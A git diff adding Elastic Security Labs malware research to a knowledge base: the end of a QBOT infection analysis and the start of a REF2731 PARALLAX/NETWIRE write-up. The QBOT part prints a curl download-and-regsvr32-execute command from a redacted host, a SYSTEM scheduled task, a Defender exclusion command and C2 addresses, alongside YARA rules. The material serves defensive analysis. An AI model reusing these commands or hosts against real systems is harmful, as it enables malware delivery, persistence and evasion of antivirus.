+Note, that the domains in the initial execution appear to be adversary-controlled, not adversary-owned; because of this, we are redacting them from our reporting.
+
+The initial execution command does the following:
+
+- **C:\Windows\System32\cmd.exe** - this executes the Microsoft command interpreter
+- **/q** - this switch of **cmd.exe** is to suppress echo output
+- **/c** - this switch of **cmd.exe** is to pass a specific command string to the command interpreter
+- **echo ‘Ft’** - this prints **‘Ft’** to STDOUT
+- **&&** - if the preceding commands were successful, continue and run the next series of commands
+- **ping REDACTED[.]com** - this performs a network connection test to an external domain using the Ping command
+- **MD “\\vyr”** - this creates the **vyr** directory in the root directory ( \*\*C:\*\* )
+- **curl.exe** - this executes the data transfer tool, cURL
+- **-o \\vyr\v4QpQt.Nqv.e8xO `https://REDACTED[.]net/t8EKnIB/C.png`** - using the cURL tool, download and save the **C.png** file, from **REDACTED[.]net**, to the **vyr** directory with a filename of **v4QpQt.Nqv.e8xO**
+- **echo "sxF"** - this prints **“sxF”** to STDOUT
+- **regsvr32 "\\vyr\v4QpQt.Nqv.e8xO"** - uses the Microsoft Register Server ( **regsvr32** ) to execute **v4QpQt.Nqv.e8xO**
+
+The infection was prevented by Elastic Endpoint Security, so while the customer was protected, it stopped our ability to monitor the next steps in the infection. To continue the analysis, we manually detonated the sample in our sandbox.
+
+### Manually Advancing Execution
+
+This manual detonation picked up where Elastic Endpoint Security stopped the initial execution outlined above.
+
+To allow the infection to continue, the sample was downloaded to our victim machine and executed manually using the [Microsoft Register Server](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32) ( **regsvr32.exe** ). The Register Server is a command-line utility to register and unregister DLLs (and other objects) in the Windows Registry.
+
+```
+**regsvr32 -s c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a.dll**
+```
+
+- **regsvr32** - this executes the Microsoft Register Server
+- **-s** - this suppresses messages boxes
+
+Now that we have manually executed the Qbot DLL, we can track the execution chain, defense evasion, and persistence techniques using the Elastic Security Solution.
+
+From within the Security Solution, we can expand the malware event generated by the Qbot DLL execution and explore the details. While we manually executed the malware and know much of this information, it is still helpful as an analyst when researching live malware events.
+
+![Initial alert in the Kibana Security Solution](/assets/images/exploring-the-qbot-attack-pattern/initial_alert_in_security_solution.jpg)
+
+From here we can click on the “Analyze event” button to launch a timeline as a process tree that will show us how the malware progressed and additional contextually relevant information.
+
+![Viewing the execution chain as a process tree](/assets/images/exploring-the-qbot-attack-pattern/analyze_event_button.jpg)
+
+Now that we’re in the Analyzer view, we can continue to step through the QBOT DLL execution chain.
+
+![Microsoft Registry Server used to execute the QBOT DLL](/assets/images/exploring-the-qbot-attack-pattern/regsvr32_used_to_execute_dll.jpg)
+
+The Microsoft command interpreter was opened, and then the first **regsvr32.exe** process is started from **C:\Windows\System32\.** Next, a child **regsvr32.exe** process is spawned from **C:\Windows\SysWOW64\*\* with the same command-line arguments. The **SysWOW64\*\* folder stores system files used to execute 32-bit processes on a 64-bit Windows operating system. This is expected because the Qbot DLL is a 32-bit file.
+
+Once the DLL is executed by **regsvr32.exe** , it injects itself into the Explorer process.
+
+Next, an **explorer.exe** process is started then immediately self-injects shellcode. In addition to the shellcode injection, we can see 17 file events, 32 network-based events, and 16 registry events observed. We’ll explore those further in the research.
+
+![QBOT injecting into explorer.exe](/assets/images/exploring-the-qbot-attack-pattern/injects_into_explorer_exe.jpg)
+
+Before proceeding, QBOT performs a check to prevent execution on systems that are using the following default system languages:
+
+- LANG_RUSSIAN (Russia)
+- LANG_BELARUSIAN (Belarus)
+- LANG_KAZAK (Kazakhstan)
+- LANG_ARMENIAN (Armenia)
+- LANG_GEORGIAN (Georgia)
+- LANG_UZBEK (Uzbekistan)
+- LANG_TAJIK (Tajikistan)
+- LANG_TURKMEN (Turkmenistan)
+- LANG_UKRAINIAN (Ukraine)
+- LANG_BOSNIAN (Bosnia)
+- LANG_KYRGYZ (Kyrgyzstan)
+
+![QBOT checking for specified default system languages](/assets/images/exploring-the-qbot-attack-pattern/watchdog_keyboard.jpg)
+
+### Defense Evasion
+
+Once the initial execution chain was completed, we observed attempts at defense evasion to protect the malware and frustrate adversary eviction.
+
+As noted above, Elastic Endpoint Security observed 17 file events from the injected **explorer.exe**. One of the 17 events occurred when the DLL copied itself from its current path to **C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Vybgeuye** and named itself **maonyo.dll**. The **maonyo.dll** file is the same file as the original Qbot DLL that was manually executed, verified by the SHA-256 hash.
+
+![Creating of the maonyo.dll file](/assets/images/exploring-the-qbot-attack-pattern/maonyo_dll_file_creation.jpg)
+
+This defense evasion tactic will allow the QBOT DLL to continue to be executed even if the original file is deleted.
+
+In addition to creating the **maonyo.dll** file, static malware analysis identified a thread called “watchdog”. The watchdog thread monitors for security instrumentation tools that are stored in a list and compared to running processes.
+
+Every second, the watchdog thread will check to see if any of the running processes matches anything on the list.
+
+The processes that are monitored for are common security analysis tools.
+
+![Watchdog monitoring for security tooling](/assets/images/exploring-the-qbot-attack-pattern/watchdog_processes.jpg)
+
+If any of the monitored processes are observed by the malware, it will proceed with randomly generated IP addresses instead of the hard coded ones in the resources section. If a monitored process is detected, an entry is made to the Windows Registry and the malware does not attempt to connect to the actual network infrastructure.
+
+Of note, the **qak_proxy** process identified in the monitored process list is unknown to us. It is possible that this is for an undisclosed security tool that monitors for QBOT network communications or when QBOT is acting as a proxy (which we did not observe with our sample), but that is speculative in nature.
+
+The static analysis showed that the malware is able to detect running antivirus by checking the list of running processes against known vendors binaries. Depending on the antivirus processes detected, the malware has different behaviors - as an example, if Windows Defender is detected, it add its persistence folder to the Windows Defender exclusion path.
+
+![Watchdog monitoring for antivirus processes](/assets/images/exploring-the-qbot-attack-pattern/watchdog_av_2.jpg)
+
+![QBOT adding a Windows Defender exclusion path](/assets/images/exploring-the-qbot-attack-pattern/registry_defender_exclusion.jpg)
+
+The **reg.exe** command does the following:
+
+- **C:\Windows\system32\reg.exe** - Microsoft Registry editor
+- **ADD HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths** - folder location in the registry for Windows Defender exclusions
+- **/f** - adds the registry entry without prompting for confirmation
+- **/t REG_DWORD** - specifies the type for the registry entry
+- **/v C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Vybgeuye** - specifies the name of the registry entry
+- **/d 0** - specifies the data for the new registry entry
+
+### Persistence
+
+After the **maonyo.dll** file is created at the random location, **C:\Users\[REDACTED]\AppData\Roaming\Microsoft\Vybgeuye\*\* (see the Defense Evasion section) in our example, the **HKEY_USERS\S-1-5-21-1047687853-4161697681-4019128061-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lnkotdhh** and **HKEY_CURRENT_USER\SOFTWARE\Microsoft\Maonyoeve** Windows Registry paths are created to execute the **maoyno.dll** file every time the user with the SID **S-1-5-21-1047687853-4161697681-4019128061-1002\*\* logs onto the infected host. This SID is for the user that we used when detonating the DLL.
+
+> While we did not observe QBOT spreading to other users' SIDs in the Windows Registry during dynamic analysis, static analysis shows that this capability exists.
+
+We were able to identify the registry path creations using Kibana (see below and in the Defense Evasion section), the security researchers over at Trustwave’s Spider Labs published some [great research](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/) about how to find the location of the created QBOT DLL by decrypting binary data stored at **HKEY_CURRENT_USER\SOFTWARE\Microsoft\[random folder]**.
+
+![Logon script added to the Windows Registry](/assets/images/exploring-the-qbot-attack-pattern/registry_logon_script.jpg)
+
+Using the [decryption tool](https://github.com/drole/qakbot-registry-decrypt) that Spider Labs released as part of their research, we were able to manually validate what we were seeing in Kibana.
+
+![Decrypting binary data added to the Windows Registry](/assets/images/exploring-the-qbot-attack-pattern/registry_decrypt_binary.jpg)
+
+### Privilege Escalation
+
+The privilege escalation mechanism we observed was when the injected **explorer.exe** process spawns **schtasks.exe** and creates a new scheduled task to run as the SYSTEM user.
+
+![Scheduled task creation](/assets/images/exploring-the-qbot-attack-pattern/scheduled_task.jpg)
+
+```
+**C:\Windows\system32\schtasks.exe, /Create, /RU, NT AUTHORITY\SYSTEM, /tn, ayttpnzc, /tr, regsvr32.exe -s "c:\Users\[REDACTED]\Desktop\7611346142\c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a.dll", /SC, ONCE, /Z, /ST, 15:21, /ET, 15:33**
+```
+
+The initial **schtasks.exe** command does the following:
+
+- **/Create** - creates a scheduled task
+- **/RU** **NT AUTHORITY\SYSTEM** - sets the username and escalates privilege as the **SYSTEM** user
+- **/tn ayttpnzc** - defines the task name
+- **/tr** **regsvr32.exe -s "c:\Users\[REDACTED]\Desktop\7611346142\c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a.dll** - specifies the task to run
+- **/sc ONCE** - specifies the schedule frequency - once
+- **/Z** - option that marks the task to be deleted after its execution
+- **/ST 15:21** - specifies the task start time (scheduled to start approximately 2-minutes after the scheduled task was created)
+- **/ET 15:33** - time to end the task if not completed
+
+## Network Events
+
+As we highlighted in the Preamble, there were 32 observed network events generated by the QBOT DLL. In addition to the 32 events that we observed from the execution, we also identified 106 additional hard-coded IP addresses through static analysis. This provided us with a total of 138 IP addresses from our Qbot sample.
+
+Comparing the IP addresses against a corpus of malicious files, we identified 338 additional samples communicating with the same network infrastructure.
+
+![Network infrastructure observed in multiple samples](/assets/images/exploring-the-qbot-attack-pattern/network_events.jpg)
+
+When looking at the distribution of network and malware data points, not all of the samples are related to QBOT. Most of the Win32DLL files are QBOT related, most of the Win32EXE files are associated with the [EMOTET malware family](https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet), and the Microsoft Office samples are related to generic malspam attachments.
+
+![Samples by file type](/assets/images/exploring-the-qbot-attack-pattern/sample_file_types.jpg)
+
+Furthermore, looking at the samples over time, we can see a change in how the network infrastructure was being used. On November 4, 2020, we see a change from predominantly EMOTET and generic samples to the first QBOT sample in our dataset on November 28, 2020. From there, Win32DLL files make up 97.1% of samples first observed after November 2020.
+
+![Collected samples over time](/assets/images/exploring-the-qbot-attack-pattern/all_samples_over_time.jpg)
+
+### Analyzing Network Events
+
+When looking at the large number of IP addresses collected from both static and dynamic analysis, we wanted to put them into a data analysis platform so that we could visualize them geographically and identify the network owners.
+
+To do this, we used the ipinfo.io CLI tool. You can [get an API key](https://ipinfo.io/signup) and download the [tool for free](https://github.com/ipinfo/cli).
+
+To start, we collected our list of 138 IP addresses and then sent them through the ipinfo CLI tool as a bulk job, and output results as JSON into a file called **qbot.json**.
+
+```
+$ ipinfo bulk > qbot.json
+** manual input mode **
+Enter all IPs, one per line:
+140.82.49.12
+144.202.2.175
+144.202.3.39
+149.28.238.199
+45.63.1.12
+45.76.167.26
+…truncated…
+{
+  "140.82.49.12": {
+    "ip": "140.82.49.12",
+    "hostname": "140.82.49.12.vultrusercontent.com",
+    "city": "San Jose",
+    "region": "California",
+    "country": "US",
+    "country_name": "United States",
+    "loc": "37.3394,-121.8950",
+    "org": "AS20473 The Constant Company, LLC",
+    "postal": "95103",
+    "timezone": "America/Los_Angeles"
+  },
+  "144.202.2.175": {
+    "ip": "144.202.2.175",
+    "hostname": "144.202.2.175.vultrusercontent.com",
+    "city": "New York City",
+    "region": "New York",
+    "country": "US",
+    "country_name": "United States",
+    "loc": "40.7143,-74.0060",
+    "org": "AS20473 The Constant Company, LLC",
+    "postal": "10004",
+    "timezone": "America/New_York"
+  },
+…truncated…
+```
+
+Next, we need to change this into to a newline-delimited JSON (NDJSON) file so that we can quickly upload it into Elasticsearch for analysis. To do this, we can use the tool [Jquery](https://stedolan.github.io/jq/), a command-line JSON processor.
+
+```
+$ cat qbot.json | jq -c '.[]' > qbot.ndjson
+
+{"ip":"140.82.49.12","hostname":"140.82.49.12.vultrusercontent.com","city":"San Jose","region":"California","country":"US","country_name":"United States","loc":"37.3394,-121.8950","org":"AS20473 The Constant Company, LLC","postal":"95103","timezone":"America/Los_Angeles"}
+{"ip":"144.202.2.175","hostname":"144.202.2.175.vultrusercontent.com","city":"New York City","region":"New York","country":"US","country_name":"United States","loc":"40.7143,-74.0060","org":"AS20473 The Constant Company, LLC","postal":"10004","timezone":"America/New_York"}
+…truncated…
+```
+
+Now that we have an NDJSON file, we can upload that into Elasticsearch through Kibana (or with Filebeat or the Elastic Agent). To do this, we’ll use the [Elastic Container Project](https://github.com/peasead/elastic-container) to spin up an entire Elastic Stack in Docker to do our analysis.
+
+Once the containers have spun up, navigate to the Data Visualizer from within the Machine Learning menu. Select the NDJSON file that you created previously, and click the blue Import button.
+
+Provide an index name and then click on the Advanced tab. Under the Mappings settings, change **loc** to **geo_point** and then click the blue Import button.
+
+![Set "loc" to "geo_point"](/assets/images/exploring-the-qbot-attack-pattern/data_visualizer_geo_point.jpg)
+
+Now that we have the data loaded into Elasticsearch, you can do additional analysis, such as creating a [map visualization](https://www.elastic.co/guide/en/kibana/current/maps.html).
+
+When looking at the distribution of network entities, we see them spread across the globe with most of them belonging to a variety of Internet service providers.
+
+![Map of all identified network infrastructure](/assets/images/exploring-the-qbot-attack-pattern/network_all_ips.jpg)
+
+A caveat to the ISP-owned addresses, we did observe 7 IP addresses owned by Vultr. Vultr is a legitimate cloud hosting provider and is also a favorite among adversaries because of the ability to upload custom ISO files that allow for a protected command & control server.
+
+![Network infrastructure node information](/assets/images/exploring-the-qbot-attack-pattern/network_vultr.jpg)
+
+## QBOT Configuration Extractor
+
+Collecting elements of malware events is a valuable analysis skill that can assist in the identification of additional compromised hosts in a contested environment.
+
+Elastic Security Labs has released an open source tool, under the Apache 2.0 license, that will allow for configurations to be extracted from QBOT samples. The tool can be downloaded [here](https://www.elastic.co/security-labs/qbot-configuration-extractor).
+
+```
+$ qbot-config-extractor -f c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a
+
+=== Strings ===
+# Blob address: 0x100840a0
+# Key address: 0x10084040
+[0x0]: ProgramData
+[0xc]: /t4
+[0x10]: EBBA
+[0x15]: netstat -nao
+[0x22]: jHxastDcds)oMc=jvh7wdUhxcsdt2
+[0x40]: schtasks.exe /Create /RU "NT AUTHORITY\SYSTEM" /SC ONSTART /TN %u /TR "%s" /NP /F
+
+...truncated...
+
+=== RESOURCE 1 ===
+Key: b'\\System32\\WindowsPowerShel1\\v1.0\\powershel1.exe'
+Type: DataType.DOMAINS
+41.228.22.180:443
+47.23.89.62:995
+176.67.56.94:443
+103.107.113.120:443
+148.64.96.100:443
+47.180.172.159:443
+181.118.183.98:443
+
+...truncated...
+```
+
+We have asked Vultr to review our QBOT research and take appropriate actions in accordance with their customer Use Policy, but have not received a response as of publication.
+
+## Observed Adversary Tactics and Techniques
+
+### Tactics
+
+Using the MITRE ATT&CK® framework, tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)
+- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)
+- [Command and Control](https://attack.mitre.org/tactics/TA0011)
+
+### Techniques / Sub Techniques
+
+Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003)
+- [Scheduled Task/Job: Scheduled Task](https://attack.mitre.org/techniques/T1053/005)
+- [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)
+- [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001)
+- [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)
+- [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001)
+- [Indicator Removal on Host: File Deletion](https://attack.mitre.org/techniques/T1070/004)
+
+## Detections
+
+The following detection rules and behavior prevention events were observed throughout the analysis of the QBOT sample.
+
+- [Suspicious Execution via Scheduled Task](https://www.elastic.co/guide/en/security/current/suspicious-execution-via-scheduled-task.html)
+- [Startup or Run Key Registry Modification](https://www.elastic.co/guide/en/security/current/startup-or-run-key-registry-modification.html)
+- Memory Threat Detection Alert: Shellcode Injection
+- Malicious Behavior Detection Alert: Suspicious String Value Written to Registry Run Key
+- Malicious Behavior Detection Alert: Suspicious Scheduled Task Creation
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity.
+
+```
+rule Windows_Trojan_Qbot_1 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2021-02-16"
+        last_modified = "2021-08-23"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Qbot"
+        threat_name = "Windows.Trojan.Qbot"
+        reference_sample = "636e2904276fe33e10cce5a562ded451665b82b24c852cbdb9882f7a54443e02"
+
+    strings:
+        $a1 = { 33 C0 59 85 F6 74 2D 83 66 0C 00 40 89 06 6A 20 89 46 04 C7 46 08 08 00 }
+        $a2 = { FE 8A 14 06 88 50 FF 8A 54 BC 11 88 10 8A 54 BC 10 88 50 01 47 83 }
+    condition:
+        any of them
+}
+
+rule Windows_Trojan_Qbot_2 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2021-10-04"
+        last_modified = "2022-01-13"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Qbot"
+        threat_name = "Windows.Trojan.Qbot"
+        reference_sample = "a2bacde7210d88675564106406d9c2f3b738e2b1993737cb8bf621b78a9ebf56"
+
+    strings:
+        $a1 = "%u.%u.%u.%u.%u.%u.%04x" ascii fullword
+        $a2 = "stager_1.dll" ascii fullword
+    condition:
+        all of them
+}
+
+rule Windows_Trojan_Qbot_3 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-03-07"
+        last_modified = "2022-04-12"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Qbot"
+        threat_name = "Windows.Trojan.Qbot"
+        reference_sample = "0838cd11d6f504203ea98f78cac8f066eb2096a2af16d27fb9903484e7e6a689"
+
+    strings:
+        $a1 = { 75 C9 8B 45 1C 89 45 A4 8B 45 18 89 45 A8 8B 45 14 89 45 AC 8B }
+        $a2 = "\\stager_1.obf\\Benign\\mfc\\" wide
+    condition:
+        any of them
+}
+
+rule Windows_Trojan_Qbot_4 {
+    meta:
+        author = "Elastic Security"
+        creation_date = "2022-06-07"
+        last_modified = "2022-07-18"
+        os = "Windows"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "Qbot"
+        threat_name = "Windows.Trojan.Qbot"
+        reference_sample = "c2ba065654f13612ae63bca7f972ea91c6fe97291caeaaa3a28a180fb1912b3a"
+
+    strings:
+        $a1 = "qbot" wide
+        $a2 = "stager_1.obf\\Benign\\mfc" wide
+        $a3 = "common.obf\\Benign\\mfc" wide
+        $a4 = "%u;%u;%u;"
+        $a5 = "%u.%u.%u.%u.%u.%u.%04x"
+        $a6 = "%u&%s&%u"
+        $get_string1 = { 33 D2 8B ?? 6A 5A 5? F7 ?? 8B ?? 08 8A 04 ?? 8B 55 ?? 8B ?? 10 3A 04 ?? }
+        $get_string2 = { 33 D2 8B ?? F7 75 F4 8B 45 08 8A 04 02 32 04 ?? 88 04 ?? ?? 83 ?? 01 }
+        $set_key = { 8D 87 00 04 00 00 50 56 E8 ?? ?? ?? ?? 59 8B D0 8B CE E8 }
+        $do_computer_use_russian_like_keyboard = { B9 FF 03 00 00 66 23 C1 33 C9 0F B7 F8 66 3B 7C 4D }
+        $execute_each_tasks = { 8B 44 0E ?? 85 C0 74 ?? FF D0 EB ?? 6A 00 6A 00 6A 00 FF 74 0E ?? E8 ?? ?? ?? ?? 83 C4 10 }
+        $generate_random_alpha_num_string = { 57 E8 ?? ?? ?? ?? 48 50 8D 85 ?? ?? ?? ?? 6A 00 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 10 8A 04 38 88 04 0E 46 83 FE 0C }
+        $load_base64_dll_from_file_and_inject_into_targets = { 10 C7 45 F0 50 00 00 00 83 65 E8 00 83 7D F0 0B 73 08 8B 45 F0 89 }
+    condition:
+        6 of them
+}
+```
+
+## References
+
+The following were referenced throughout the above research:
+
+- [https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/decrypting-qakbots-encrypted-registry-keys/)
+- [https://twitter.com/pr0xylife/status/1539601609730170882?s=20&t=G-XR7ibeOO0nWCWajKWTKw](https://twitter.com/pr0xylife/status/1539601609730170882?s=20&t=G-XR7ibeOO0nWCWajKWTKw)
+- [https://github.com/drole/qakbot-registry-decrypt](https://github.com/drole/qakbot-registry-decrypt)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet](https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet)
+- [https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot](https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot)
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt84567d45657fe98d/62e16c9dd2f5267009ac072e/qbot-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_the_ref2731_intrusion_set.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_the_ref2731_intrusion_set.md
new file mode 100644
index 0000000000000..10448e6686ac4
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/exploring_the_ref2731_intrusion_set.md
@@ -0,0 +1,541 @@
+---
+title: "Exploring the REF2731 Intrusion Set"
+slug: "exploring-the-ref2731-intrusion-set"
+date: "2022-12-06"
+subtitle: "REF2731 intrusion set, campaigns, and malware observations"
+description: "The Elastic Security Labs team has been tracking REF2731, an 5-stage intrusion set involving the PARALLAX loader and the NETWIRE RAT."
+author:
+  - slug: salim-bitam
+  - slug: daniel-stepanic
+  - slug: seth-goodwin
+  - slug: andrew-pease
+image: "ref-intrusion.jpg"
+category:
+  - slug: campaigns
+  - slug: attack-pattern
+  - slug: malware-analysis
+tags:
+  - ref2731
+  - parallax
+  - netwire
+---
+
+## Key Takeaways
+
+- PARALLAX loader maldoc campaigns continue to have success delivering the NETWIRE RAT.
+- The PARALLAX loader leverages advanced features including DLL-side loading, syscall usage, process, and steganography.
+- Shared infrastructure can be used to stitch campaigns and intrusion sets together.
+
+## Preamble
+
+The Elastic Security Labs team has been tracking REF2731, an intrusion set involving the [PARALLAX loader](https://twitter.com/malwrhunterteam/status/1227196799997431809) which deploys the NETWIRE RAT. This activity has managed to stay under the radar with low detection rates and continues to incorporate interesting techniques such as DLL side-loading, syscall adoption, process injection, and leveraging steganography.
+
+[PARALLAX](https://malpedia.caad.fkie.fraunhofer.de/details/win.parallax) is a full-featured modal backdoor and loader featuring defense evasion and information on stealing capabilities, first observed in 2020 and associated with COVID-19 malspam campaigns. [NETWIRE](https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire) is a mature and cross-platform RAT that was first observed in 2012
+
+In this research publication, we will go through the execution flow of one of the observed campaigns, the different features of the PARALLAX loader, technical analysis around the campaigns, campaign intersections, detection logic, and atomic indicators.
+
+## Execution Flow (PARALLAX loader)
+
+The Elastic Security Labs team has been monitoring multiple campaigns over the past year leveraging the [PARALLAX loader](https://blog.morphisec.com/parallax-rat-active-status). PARALLAX has multiple capabilities and use cases. This analysis observed the PARALLAX loader being used to load other remote access tools (the NETWIRE RAT). Using our PARALLAX payload extractor, we have also observed the PARALLAX loader being used to load the PARALLAX RAT for interactive remote access. These infections typically start through email spam campaigns delivering macro-enabled lure documents.
+
+> On July 27, 2022, Microsoft began rolling out a [change to Office documents](https://learn.microsoft.com/en-us/deployoffice/security/internet-macros-blocked) that will prevent users from opening macros in files that came from the Internet, such as email attachments. We have not observed a change in TTPs based on this update from this intrusion set. Our sampling for this research of macro-enabled Word documents started in March of 2022 and continued through August 2022.
+
+High-level summary of the execution flow:
+
+1. An email is sent to a victim with a macro-enabled Microsoft Word document attachment.
+2. The macro downloads malicious files used for DLL-side loading and injection.
+3. The Microsoft developer tool ( **MsiDb.exe** ) sideloads the malicious ( **msi.dll** ).
+4. This malicious DLL drops and decrypts a WAV file ( **cs16.wav** ) before injecting the contents (shellcode) into **cmd.exe**.
+5. The injected shellcode is used to extract the NETWIRE RAT and set up the PARALLAX loader from a dropped image ( **paper.png** ) and inject into **cmd.exe.**
+6. A scheduled task is used to establish persistence for the PARALLAX RAT.
+7. The NETWIRE payload is then executed and sets up its own persistence mechanism.
+
+![Execution flow diagram](/assets/images/exploring-the-ref2731-intrusion-set/image30.png)
+
+### First Stage (lure/macro)
+
+The first stage in these campaigns involves macro-enabled lure documents typically with themes around United States tax filings.
+
+![Image from lure document walking victim through enabling macros](/assets/images/exploring-the-ref2731-intrusion-set/image9.jpg)
+
+In this lure, we observed legitimate code lifted from the [GLPK](https://www.gnu.org/software/glpk/) (GNU Linear Programming Kit) used to bypass static analysis of the macro. The malicious code is then interwoven within the macro making it look very genuine and more deceptive.
+
+![Legitimate code from GLPK used in macro](/assets/images/exploring-the-ref2731-intrusion-set/image12.jpg)
+
+This approach to obfuscation is also observed when critical components used for the next stage are not stored in the macro itself but called from text buried several pages deep within the lure document.
+
+![Download components embedded as text](/assets/images/exploring-the-ref2731-intrusion-set/image1.jpg)
+
+The macro parses the embedded paragraph text on page three of the lure document and locates the object names and next stage components based on their string length. This is a clever technique to avoid detection based on static analysis of the macro (green text comments added to the images below by ESL for clarity).
+
+![VBA code parsing](/assets/images/exploring-the-ref2731-intrusion-set/image25.jpg)
+
+The macro then uses the **CreateObject** function to create the required objects and download each of the malware components, saving them to the **AppData** directory of the current user.
+
+![VBA code to create objects](/assets/images/exploring-the-ref2731-intrusion-set/image26.jpg)
+
+It then executes **AppData\MsiDb.exe** through the created **wscript.shell** object.
+
+For this observed lure, the five components that are downloaded for the next stage as identified in the embedded text image above are:
+
+| Filename  | Description                                                                                                                     |
+| --------- | ------------------------------------------------------------------------------------------------------------------------------- |
+| MsiDb.exe | Legitimate Microsoft development application used to import/export database tables and streams                                  |
+| msi.dll   | Malicious DLL used for side-loading                                                                                             |
+| cs16.wav  | XOR encrypted shellcode                                                                                                         |
+| paper.png | Obfuscated NETWIRE and additional PARALLAX loader stager                                                                        |
+| cs16.cfg  | Configuration containing the location of the next execution stage png file, it can either be local or hosted in a remote server |
+
+### Second Stage (MsiDb.exe)
+
+One of the key strengths in these campaigns is its ability to bypass static detection by modifying legitimate DLLs, a common trend previously reported with the BLISTER loader analysis [[1](https://www.elastic.co/security-labs/blister-loader), [2](https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign)]. Once all the components are retrieved, the macro executes the signed Microsoft development tool ( **MsiDb.exe** ) to load the previously downloaded malicious library ( **msi.dll** ).
+
+When the campaign began in September of 2022, this DLL had zero detections in VirusTotal due to its DLL tampering technique where a slight modification of a benign function is overwritten with the second stage.
+
+![0 detection rate on initial upload in VirusTotal](/assets/images/exploring-the-ref2731-intrusion-set/image35.jpg)
+
+When ( **MsiDb.exe** ) sideloads the malicious ( **msi.dll** ) module, we can see the difference between the patched and unpatched version of **msi.dll**.
+
+![Comparison between the original and the patched msi.dll function](/assets/images/exploring-the-ref2731-intrusion-set/image36.jpg)
+
+During this loading stage, the malicious code is heavily obfuscated and leverages [dynamic API resolution](https://unprotect.it/technique/api-obfuscation/) to bypass static analysis tools and processes. It performs this using two functions:
+
+- One function is used to retrieve library addresses using the CRC32 checksum hash of the requested library name.
+- Another function is used to take the address of the library and the hash of the API name.
+
+![Malicious code performing dynamic API resolution](/assets/images/exploring-the-ref2731-intrusion-set/image21.jpg)
+
+The malware then builds its own import table, storing it on the stack. An interesting aspect is that the malicious code performs an anti-analysis check to see if the current process name matches the targeted application ( **MsiDb.exe** ), if it doesn’t match, the malware will stop at this stage. This check will hinder automated dynamic analysis systems that might try to analyze **msi.dll** in isolation by executing it with other common applications such as **rundll32.exe** or **regsvr32.exe**.
+
+Next, the malware will load **cs16.wav** and XOR-decrypt it using a key embedded in the file. The key resides in the 200 bytes following the first 4 bytes of the file (bytes 5-204).
+
+The malware will then execute the shellcode inside the decrypted WAV file.
+
+### Third Stage (shellcode)
+
+To evade user mode hooks utilized by EDR/AV products and as debugger breakpoints, the malware uses direct system calls to low-level APIs used for process injection. It performs this by first [mapping a file view](https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping) of the Windows **ntdll.dll** library from the System directory.
+
+![NTDLL mapping](/assets/images/exploring-the-ref2731-intrusion-set/image40.jpg)
+
+It then retrieves the API offset by subtracting the API address from the loaded base address of the loaded **ntdll.dll** , then finally it will use the offset from the mapped **ntdll.dll** and extract the syscall number.
+
+![Extracting the syscall number](/assets/images/exploring-the-ref2731-intrusion-set/image23.jpg)
+
+After this, the loader uses the [Heaven’s Gate technique](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/) and performs injection in the suspended **cmd.exe** process leveraging native Windows **ZwAllocateVirtualMemory** , **ZwWriteVirtualMemory,** and **ZwResumeThread** API functions.
+
+### Fourth Stage
+
+One interesting technique observed during this stage is through the use of a dropped file ( **cs16.cfg** ). The file is a legitimate Python header file and is prepended with the next stage file name ( **paper.png** ). In our observations, these point to local files previously downloaded but also has the flexibility to point to hosted objects. This is another example of using benign code to obfuscate more malicious intent.
+
+![Prepending paper.png to cs16.cfg](/assets/images/exploring-the-ref2731-intrusion-set/image20.jpg)
+
